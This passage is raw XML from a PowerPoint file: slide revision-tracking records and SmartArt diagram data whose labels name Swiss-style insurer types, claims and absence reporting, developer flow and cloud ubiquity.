            <ac:spMk id="16" creationId="{5C0776A0-F3D1-AEC9-DE44-3676E3568899}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:47.156" v="44"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3285621786" sldId="342"/>
            <ac:cxnSpMk id="12" creationId="{D8689CE0-64D2-447C-9C1F-872D111D8AC3}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:47.156" v="44"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3285621786" sldId="342"/>
            <ac:cxnSpMk id="18" creationId="{B0AA360F-DECB-4836-8FB6-22C4BC3FB02D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod setBg delDesignElem">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:43:52.274" v="60" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4210223033" sldId="343"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:43:52.274" v="60" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4210223033" sldId="343"/>
            <ac:spMk id="2" creationId="{F1F3F12D-7DC7-FC16-F204-EED69F3C7BC4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:43:28.162" v="51"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4210223033" sldId="343"/>
            <ac:spMk id="27" creationId="{47DDD5C6-582A-4ED0-A2B2-01007B337089}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:43:28.162" v="51"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4210223033" sldId="343"/>
            <ac:spMk id="29" creationId="{C5480330-D626-4BB1-A072-22D07F7C66BE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:43:28.162" v="51"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4210223033" sldId="343"/>
            <ac:spMk id="31" creationId="{76D82CD3-3F7A-45BD-8A7F-2C5662B57BEC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:43:28.162" v="51"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4210223033" sldId="343"/>
            <ac:cxnSpMk id="25" creationId="{D8689CE0-64D2-447C-9C1F-872D111D8AC3}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:43:28.162" v="51"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4210223033" sldId="343"/>
            <ac:cxnSpMk id="33" creationId="{CFA49A52-5015-434E-A9B4-E3B97DB8B4ED}"/>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641D6F-12B2-432A-A6A0-B8C6274E9360}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/pList1" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent6_2" csCatId="accent6" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-CH"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8EEDE93C-7234-4394-A540-77C14C7E4D35}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH" dirty="0"/>
            <a:t>Health </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0" err="1"/>
            <a:t>insurers</a:t>
          </a:r>
          <a:endParaRPr lang="de-CH" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2B5D1A6-A8AF-45AD-A286-AA13501DA8DA}" type="parTrans" cxnId="{BE56FF37-7C01-4A7E-85B1-8094FF313750}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-CH"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D491CF1-585B-4155-9EF2-047A4A2F7659}" type="sibTrans" cxnId="{BE56FF37-7C01-4A7E-85B1-8094FF313750}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-CH"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E957209-FCE2-4CA4-A214-0D09D6D364F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH" dirty="0" err="1"/>
            <a:t>Accident</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0" err="1"/>
            <a:t>daily</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0" err="1"/>
            <a:t>allowance</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0" err="1"/>
            <a:t>insurers</a:t>
          </a:r>
          <a:endParaRPr lang="de-CH" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1B35BBAE-F903-46ED-BEA1-41DAEFD80010}" type="parTrans" cxnId="{D7924BCB-0623-4DFD-84B7-94352DBDCE4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-CH"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7126B2D4-ED89-4734-BC05-0A2EBC54672C}" type="sibTrans" cxnId="{D7924BCB-0623-4DFD-84B7-94352DBDCE4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-CH"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99C9BA51-BEA5-42BC-9FE6-8DA49DC72FDA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH" dirty="0"/>
            <a:t>Life </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0" err="1"/>
            <a:t>insurers</a:t>
          </a:r>
          <a:endParaRPr lang="de-CH" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC54F4A6-A702-4862-A368-5B8DEA8F9F97}" type="parTrans" cxnId="{AF78AAE2-86E1-42AD-8B09-BDDD3084FF99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-CH"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD59B188-7137-435B-A164-ABB7CDA98921}" type="sibTrans" cxnId="{AF78AAE2-86E1-42AD-8B09-BDDD3084FF99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-CH"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20F1D5D1-C63B-486D-875C-3D0D7D460C4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH" dirty="0"/>
            <a:t>Claims and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0" err="1"/>
            <a:t>absence</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0" err="1"/>
            <a:t>reporting</a:t>
          </a:r>
          <a:endParaRPr lang="de-CH" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FAE2DEE-5412-44F3-85F2-8488698B269B}" type="parTrans" cxnId="{8CD7D2A3-8B6E-495D-8778-D1A9EC8CF9F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-CH"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D74922C2-4D5A-435D-B63C-F121A40CAB11}" type="sibTrans" cxnId="{8CD7D2A3-8B6E-495D-8778-D1A9EC8CF9F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-CH"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2317A3C7-7F53-430D-A308-4D0817C8AE6B}" type="pres">
      <dgm:prSet presAssocID="{F2641D6F-12B2-432A-A6A0-B8C6274E9360}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AA6748E2-E1CC-4689-8671-56B0700C2572}" type="pres">
      <dgm:prSet presAssocID="{8EEDE93C-7234-4394-A540-77C14C7E4D35}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8FBFC921-8388-407C-B17E-FA10E3790AB3}" type="pres">
      <dgm:prSet presAssocID="{8EEDE93C-7234-4394-A540-77C14C7E4D35}" presName="pictRect" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1" cstate="email">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l="17274" t="2502" r="17274" b="2502"/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{5FE56542-1077-42B0-A593-F6CCD9FB7B7B}" type="pres">
      <dgm:prSet presAssocID="{8EEDE93C-7234-4394-A540-77C14C7E4D35}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DA40B320-DF25-479B-BBBA-8B4F3A6310ED}" type="pres">
      <dgm:prSet presAssocID="{7D491CF1-585B-4155-9EF2-047A4A2F7659}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{26B83E8B-6EA2-40A8-893B-DF81291C40B2}" type="pres">
      <dgm:prSet presAssocID="{3E957209-FCE2-4CA4-A214-0D09D6D364F6}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2130F77D-5F09-4A10-BE88-C749AD5EF43A}" type="pres">
      <dgm:prSet presAssocID="{3E957209-FCE2-4CA4-A214-0D09D6D364F6}" presName="pictRect" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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7274" t="2502" r="17274" b="2502"/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{75E5A85C-4A24-4BC6-8632-6CC0750CD8B3}" type="pres">
      <dgm:prSet presAssocID="{3E957209-FCE2-4CA4-A214-0D09D6D364F6}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B3271F52-87FD-4CB3-8532-13D68FC7EBBA}" type="pres">
      <dgm:prSet presAssocID="{7126B2D4-ED89-4734-BC05-0A2EBC54672C}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BC4AB815-755A-4DB8-A801-B7283B798D36}" type="pres">
      <dgm:prSet presAssocID="{99C9BA51-BEA5-42BC-9FE6-8DA49DC72FDA}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{379620AC-81E9-4219-B808-D4C24DFCB96E}" type="pres">
      <dgm:prSet presAssocID="{99C9BA51-BEA5-42BC-9FE6-8DA49DC72FDA}" presName="pictRect" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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l="17274" t="2502" r="17274" b="2502"/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{1E737B8F-DC12-4F7A-92AB-B3ABFCA4DC99}" type="pres">
      <dgm:prSet presAssocID="{99C9BA51-BEA5-42BC-9FE6-8DA49DC72FDA}" presName="textRect" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{23F71CE0-7C88-4D92-908E-60466C7AC03C}" type="pres">
      <dgm:prSet presAssocID="{BD59B188-7137-435B-A164-ABB7CDA98921}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1574C42E-DE26-4F41-972F-7632EE4E30E8}" type="pres">
      <dgm:prSet presAssocID="{20F1D5D1-C63B-486D-875C-3D0D7D460C4F}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B8DD0E30-AE46-40A5-9F59-B448917AD061}" type="pres">
      <dgm:prSet presAssocID="{20F1D5D1-C63B-486D-875C-3D0D7D460C4F}" presName="pictRect" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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l="17274" t="2502" r="17274" b="2502"/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{9E3C7661-DDA7-41D8-888F-0998E8A33F7E}" type="pres">
      <dgm:prSet presAssocID="{20F1D5D1-C63B-486D-875C-3D0D7D460C4F}" presName="textRect" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{41A1CC1E-601E-4B62-B81A-5990A08A14CD}" type="presOf" srcId="{7126B2D4-ED89-4734-BC05-0A2EBC54672C}" destId="{B3271F52-87FD-4CB3-8532-13D68FC7EBBA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{36982831-DF95-4243-9000-D3947C1EBF66}" type="presOf" srcId="{8EEDE93C-7234-4394-A540-77C14C7E4D35}" destId="{5FE56542-1077-42B0-A593-F6CCD9FB7B7B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{091DE237-38B9-4976-9EEA-7FE680E32EC1}" type="presOf" srcId="{7D491CF1-585B-4155-9EF2-047A4A2F7659}" destId="{DA40B320-DF25-479B-BBBA-8B4F3A6310ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{BE56FF37-7C01-4A7E-85B1-8094FF313750}" srcId="{F2641D6F-12B2-432A-A6A0-B8C6274E9360}" destId="{8EEDE93C-7234-4394-A540-77C14C7E4D35}" srcOrd="0" destOrd="0" parTransId="{C2B5D1A6-A8AF-45AD-A286-AA13501DA8DA}" sibTransId="{7D491CF1-585B-4155-9EF2-047A4A2F7659}"/>
    <dgm:cxn modelId="{FB111A62-57B0-48FB-86A0-3D92F3A25485}" type="presOf" srcId="{BD59B188-7137-435B-A164-ABB7CDA98921}" destId="{23F71CE0-7C88-4D92-908E-60466C7AC03C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{6564956F-0422-4CA4-941C-F0ACEAFF948D}" type="presOf" srcId="{99C9BA51-BEA5-42BC-9FE6-8DA49DC72FDA}" destId="{1E737B8F-DC12-4F7A-92AB-B3ABFCA4DC99}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{C37A437F-9821-41D5-85DF-67AC6534F1DD}" type="presOf" srcId="{20F1D5D1-C63B-486D-875C-3D0D7D460C4F}" destId="{9E3C7661-DDA7-41D8-888F-0998E8A33F7E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{8CD7D2A3-8B6E-495D-8778-D1A9EC8CF9F9}" srcId="{F2641D6F-12B2-432A-A6A0-B8C6274E9360}" destId="{20F1D5D1-C63B-486D-875C-3D0D7D460C4F}" srcOrd="3" destOrd="0" parTransId="{4FAE2DEE-5412-44F3-85F2-8488698B269B}" sibTransId="{D74922C2-4D5A-435D-B63C-F121A40CAB11}"/>
    <dgm:cxn modelId="{514CB8C8-9936-4520-9BAB-2F5E39EA5EFD}" type="presOf" srcId="{F2641D6F-12B2-432A-A6A0-B8C6274E9360}" destId="{2317A3C7-7F53-430D-A308-4D0817C8AE6B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{D7924BCB-0623-4DFD-84B7-94352DBDCE4C}" srcId="{F2641D6F-12B2-432A-A6A0-B8C6274E9360}" destId="{3E957209-FCE2-4CA4-A214-0D09D6D364F6}" srcOrd="1" destOrd="0" parTransId="{1B35BBAE-F903-46ED-BEA1-41DAEFD80010}" sibTransId="{7126B2D4-ED89-4734-BC05-0A2EBC54672C}"/>
    <dgm:cxn modelId="{31E865E0-18C9-45FD-8CE9-C21FA066AF56}" type="presOf" srcId="{3E957209-FCE2-4CA4-A214-0D09D6D364F6}" destId="{75E5A85C-4A24-4BC6-8632-6CC0750CD8B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{AF78AAE2-86E1-42AD-8B09-BDDD3084FF99}" srcId="{F2641D6F-12B2-432A-A6A0-B8C6274E9360}" destId="{99C9BA51-BEA5-42BC-9FE6-8DA49DC72FDA}" srcOrd="2" destOrd="0" parTransId="{FC54F4A6-A702-4862-A368-5B8DEA8F9F97}" sibTransId="{BD59B188-7137-435B-A164-ABB7CDA98921}"/>
    <dgm:cxn modelId="{3F95C4A4-D0AB-4D10-B832-AED1EA1FD17C}" type="presParOf" srcId="{2317A3C7-7F53-430D-A308-4D0817C8AE6B}" destId="{AA6748E2-E1CC-4689-8671-56B0700C2572}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{FAF7C3C7-A04B-4C4F-B602-B790113676FD}" type="presParOf" srcId="{AA6748E2-E1CC-4689-8671-56B0700C2572}" destId="{8FBFC921-8388-407C-B17E-FA10E3790AB3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{13B41620-6B82-4261-ADE0-75F3707162E9}" type="presParOf" srcId="{AA6748E2-E1CC-4689-8671-56B0700C2572}" destId="{5FE56542-1077-42B0-A593-F6CCD9FB7B7B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{5FFA3CD5-43F5-4311-BD58-955FDEFF7144}" type="presParOf" srcId="{2317A3C7-7F53-430D-A308-4D0817C8AE6B}" destId="{DA40B320-DF25-479B-BBBA-8B4F3A6310ED}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{6B9F8B5E-A643-4E1F-97E0-0E386C4EDA23}" type="presParOf" srcId="{2317A3C7-7F53-430D-A308-4D0817C8AE6B}" destId="{26B83E8B-6EA2-40A8-893B-DF81291C40B2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{E164795D-8CA8-42A9-813F-E1927F3867D0}" type="presParOf" srcId="{26B83E8B-6EA2-40A8-893B-DF81291C40B2}" destId="{2130F77D-5F09-4A10-BE88-C749AD5EF43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{3CC99C6D-1337-403B-9A0B-A07C3EB0D228}" type="presParOf" srcId="{26B83E8B-6EA2-40A8-893B-DF81291C40B2}" destId="{75E5A85C-4A24-4BC6-8632-6CC0750CD8B3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{E5C35C80-034C-403E-86BB-19FCF43A05B7}" type="presParOf" srcId="{2317A3C7-7F53-430D-A308-4D0817C8AE6B}" destId="{B3271F52-87FD-4CB3-8532-13D68FC7EBBA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{D41D80AB-F003-42FC-8B22-1464432B4635}" type="presParOf" srcId="{2317A3C7-7F53-430D-A308-4D0817C8AE6B}" destId="{BC4AB815-755A-4DB8-A801-B7283B798D36}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{CE4140B7-C989-4605-B6BD-1202C9A72B86}" type="presParOf" srcId="{BC4AB815-755A-4DB8-A801-B7283B798D36}" destId="{379620AC-81E9-4219-B808-D4C24DFCB96E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{1F9E00D5-D522-421C-B457-13DF58D67417}" type="presParOf" srcId="{BC4AB815-755A-4DB8-A801-B7283B798D36}" destId="{1E737B8F-DC12-4F7A-92AB-B3ABFCA4DC99}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{AB543493-1E17-4274-9640-B3CF6394AB84}" type="presParOf" srcId="{2317A3C7-7F53-430D-A308-4D0817C8AE6B}" destId="{23F71CE0-7C88-4D92-908E-60466C7AC03C}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{BC557A09-0CD9-4F29-90FC-279F90168A1C}" type="presParOf" srcId="{2317A3C7-7F53-430D-A308-4D0817C8AE6B}" destId="{1574C42E-DE26-4F41-972F-7632EE4E30E8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{BCFC6328-44DA-45F3-B98A-E723A3150010}" type="presParOf" srcId="{1574C42E-DE26-4F41-972F-7632EE4E30E8}" destId="{B8DD0E30-AE46-40A5-9F59-B448917AD061}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>
    <dgm:cxn modelId="{E26B4AB6-C4E6-4E5F-967C-368DCFED53D1}" type="presParOf" srcId="{1574C42E-DE26-4F41-972F-7632EE4E30E8}" destId="{9E3C7661-DDA7-41D8-888F-0998E8A33F7E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1"/>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8C0634-0058-4AA7-BCF3-151690BA706D}"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US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6FCE417A-8C24-494E-9563-C3DF00FBFF9C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH" dirty="0"/>
            <a:t>Developer </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0" err="1"/>
            <a:t>flow</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{426D72BA-952A-48DB-8E98-5FE37609E071}" type="parTrans" cxnId="{40FB05AB-AE3F-4B84-A21B-7C7D31B0714D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5387A4C-F04B-4347-BD7A-189122A74A74}" type="sibTrans" cxnId="{40FB05AB-AE3F-4B84-A21B-7C7D31B0714D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{792440E5-553F-4BC7-BF18-67182993716D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="de-CH" dirty="0"/>
            <a:t>Cloud </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" dirty="0" err="1"/>
            <a:t>ubiquity</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E595194-6D73-46B1-8EDC-C7136CA9299F}" type="parTrans" cxnId="{95006A3F-7306-4C5B-897B-8F069256DD8B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B1857A80-61C4-47C9-B0DE-E450885961DF}" type="sibTrans" cxnId="{95006A3F-7306-4C5B-897B-8F069256DD8B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3799947F-16D9-4745-AA05-DB4597835A44}">
      <dgm:prSet/>
      <dgm:spPr/>
